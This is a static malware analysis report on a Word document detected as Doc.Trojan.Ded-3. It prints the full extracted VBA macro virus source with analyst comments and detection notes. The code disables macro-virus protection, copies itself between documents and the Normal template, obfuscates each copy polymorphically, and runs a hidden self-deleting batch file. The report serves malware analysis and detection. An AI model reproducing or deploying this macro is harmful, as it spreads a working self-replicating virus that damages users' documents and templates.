Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c859f254b6fb25fb…

MALICIOUS

Office (OLE)

85.0 KB Created: 2006-08-18 16:16:00 Authoring application: Microsoft Word 10.0 First seen: 2012-09-15
MD5: 2b6bced726c6d76a15ec7bbbace15a16 SHA-1: 3c65b248b2f67c9f66e0f01291522eaa65dbed05 SHA-256: c859f254b6fb25fb1bf70959d66a0af60beec364a39d7f15ec683b8364a93e4d
142 Risk Score

Heuristics 4

  • ClamAV: Doc.Trojan.Ded-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
     _
             ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines i * 2, d
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.drudgereport.com In document text (OLE body)
    • http://www.apple.com/DTDs/PropertyList-1.0.dtd In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3961 bytes
SHA-256: bd728020a531ca9842166abfa611e270128485c47a198db81637017181cfc349
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba for the document's ThisDocument class
' module (VB_Base names Normal.ThisDocument). The procedures that follow are
' reproduced exactly as extracted: the erratic leading whitespace, the bare
' " _" continuation lines and the numeric '-comments appear to be output of
' the sample's own rewriter e() (defined further down), not an extraction
' artefact -- treat them as part of the sample when comparing variants.
 _
        Private Sub CommandButton1_Click()
' Empty click handler: no statements between the header and End Sub.

       End Sub
'87.14458
 _
    Private Sub Document_Close()
' Entry point of the sample: the Document_Close event, run when the document
' is closed. On Error GoTo skam wraps everything below, so a failure in either
' replication routine (for example when the VBProject calls they make are not
' permitted) is swallowed and execution falls through to the skam: label.

 _
             On Error GoTo skam

' `unimplemented` is not declared anywhere in this listing; without Option
' Explicit it is an empty Variant, which assignment to the Boolean property
' coerces to False -- the heuristic at the top of the report reads this line
' as Options.VirusProtection = False. Confirm in a sandbox before relying on it.
 _
           Options.VirusProtection = unimplemented

' Two replication directions, run back to back (both defined below):
'   SWL   -- copy the module from the global template into this document
'   ABS99 -- copy the module from this document into the global template
 _
  SWL

             ABS99
'1.570392
skam:
'4.564917
              End Sub
'41.27668
 _
Private Sub SWL()
' Template -> document replication. Find("Document_Close") on this document's
' first VBComponent is the infection marker: only when it is absent does the
' loop below copy every line of the global template's first code module into
' this document and save it. All of the VBProject/VBComponents/CodeModule
' access here goes through the VBE object model, which current Office versions
' only expose when "Trust access to the VBA project object model" is enabled --
' a setting worth auditing as a containment control.

          If Not ActiveDocument. _
VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

' i indexes the source (template) module; it is also advanced inside the
' While loop whenever a " _"-continued line is re-joined.
 _
For i = 1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines

 _
         d = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(i, 1)

' Skip blank lines, bare continuation markers and '-comment lines, so the
' junk comments e() produced on an earlier copy are not carried over.
 _
        If Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

            While Mid(d, _
Len(d) - 1, 2) = " _"
' Re-join a continued logical line: drop the trailing "_" and append the
' next physical line of the source module.

           i = i + _
1

  d = Left(d, Len(d) _
- 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(i, 1)

 _
   Wend

' Each joined line is rewritten by e() (random whitespace, line breaks and a
' junk comment) before being inserted at line i * 2 of the target module, so
' the copy never matches the source byte-for-byte.
          d = e(d)
'23.52822
 _
         ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines i * 2, d

 _
          End If

 _
         Next i

' Persist the injected module; AddToRecentFiles:=False keeps the save out of
' Word's recent-files list.
 _
   ActiveDocument.SaveAs AddToRecentFiles:=False

 _
       End If

 _
         End Sub

            Private _
Sub ABS99()

' Document -> template replication, the mirror of SWL: when the global
' template's first code module does not yet contain "Document_Close", clear
' its read-only attribute via f(), copy every line of this document's first
' module into it (re-joined and re-obfuscated by e(), as in SWL) and save the
' template, so the code is loaded in later Word sessions as well.
              If _
Not NormalTemplate.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

' f() gets the template's full path and strips vbReadOnly if it is set, so the
' NormalTemplate.Save below is not blocked by a read-only Normal template.
 _
  f (NormalTemplate.FullName)

           For i _
= 1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

 _
   d = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(i, 1)

' Same filter as SWL: skip blanks, bare continuation markers and comments.
 _
  If Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

' Re-join " _"-continued lines, advancing i past each continuation.
 _
          While Mid(d, Len(d) - 1, 2) = " _"

  i = i + 1
'6.585103
 _
       d = Left(d, Len(d) - 1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(i, 1)

          Wend
'4.811889
' Re-obfuscate with e() and insert at line i * 2 of the template module.
   d _
= e(d)

 NormalTemplate.VBProject. _
VBComponents(1).CodeModule.InsertLines i * 2, d

 _
       End If

 _
     Next i

' Write the modified global template to disk (the persistence step).
 _
            NormalTemplate.Save

 _
End If

 _
          End Sub

  Private Function e(aString) As _
String

' Polymorphic rewriter for one source line; called on every line SWL/ABS99
' copies. It never changes the VBA tokens, only their layout:
'   * the While loop below is meant to collapse runs of spaces (the literal
'     compared against Mid(aString, i, 2) is probably two spaces that the
'     report rendering collapsed -- unverified);
'   * with probability about 1/3 (Int(3 * Rnd) = 1) the line is split at a
'     "." or at a space that is not adjacent to a double quote, by inserting
'     " _" & Chr$(13), then prefixed with 0-14 spaces and returned early;
'   * otherwise Chr$(13) & "'" & a random number is appended -- the origin of
'     the numeric '-comment lines throughout this listing -- and the result is
'     again prefixed with 0-14 spaces.
' Consequence for detection: every copy differs in whitespace, line breaks
' and comments, so match on the CodeModule/VBProject calls and the
' VirusProtection write rather than on exact bytes or hashes.
 _
     For i = 1 To Len(aString) - 1

' Delete the character after position i while the two characters at i match
' the literal (see the caveat above about what that literal is).
         While Mid(aString, i, 2) = " "
'7.798058
 _
         aString = Left(aString, i) & Right(aString, Len(aString) - i - 1)

       Wend
'57.48649
' Branch 1: split after a "." when neither neighbour is a double quote (so
' string literals stay intact); the inner If repeats the right-hand check.
 _
  If Mid(aString, i, 1) = "." Then

 _
           If Not Mid(aString, i - 1, 1) = Chr$(34) And Not Mid(aString, i + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then

 _
           If Not Mid(aString, i + 1, 1) = Chr$(34) Then

 _
  e = Left(aString, i - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - i)

    For J _
= 1 To Int(15 * Rnd)

 _
        e = " " & e

 _
Next J

 _
     Exit Function

                   End If
'18.81318
            End If
'82.7899
 _
          Else

' Branch 2: split at a space, with the same quote-adjacency guard and i > 1.
 _
    If Mid(aString, i, 1) = " " And Int(3 * Rnd) = 1 And i > 1 Then

 _
      If Not Mid(aString, i + 1, 1) = Chr$(34) And Not Mid(aString, i - 1, 1) = Chr$(34) Then

      e _
= Left(aString, i - 1) & " _" & Chr$(13) & Right(aString, Len(aString) - i)

 _
        For J = 1 To Int(15 * Rnd)

 _
  e = " " & e

 _
  Next J

 _
      Exit Function

              End _
If

 _
     End If

     End If
'90.43737
 _
    Next i

' No split happened: append a junk comment line and random leading spaces.
 _
      e = aString & Chr$(13) & "'" & (100 * Rnd)

 _
                   Count = Int(15 * Rnd)

 _
For J = 1 To Count

 _
            e = " " & e

 _
  Next J

 _
 End Function

            Private Sub f(fName)
'43.16001
' Clears the read-only attribute of fName (ABS99 passes NormalTemplate.FullName)
' so that the template can be saved. It does this indirectly: when GetAttr
' reports vbReadOnly it writes a two-line batch file -- Attrib -r "<fName>"
' followed by del of the batch file itself -- and runs it hidden via
' Shell(..., vbHide). Dir(fName) returns the bare file name, so the batch file
' is created as <name>.bat in the process's current directory, not next to
' the template.
' Detection/forensics: a hidden command-interpreter child of the Word process
' launched from Document_Close, plus a short-lived <name>.bat; because the
' batch deletes itself, only the cleared read-only attribute persists.
 _
If GetAttr(fName) And vbReadOnly Then

' For Append: if a stale <name>.bat already exists the commands are appended
' to it rather than replacing it.
 _
Open Dir(fName) & ".bat" For Append As #1

              Print _
#1, "Attrib " & "-r " & Chr$(34) & fName & Chr$(34)

 _
        Print #1, "del " & Chr$(34) & Dir(fName) & ".bat" & Chr$(34)

 _
   Close #1

' The value Shell returns is stored but never checked.
 _
    shellResult = Shell(Dir(fName) & ".bat", vbHide)

 _
         End If

 _
      End Sub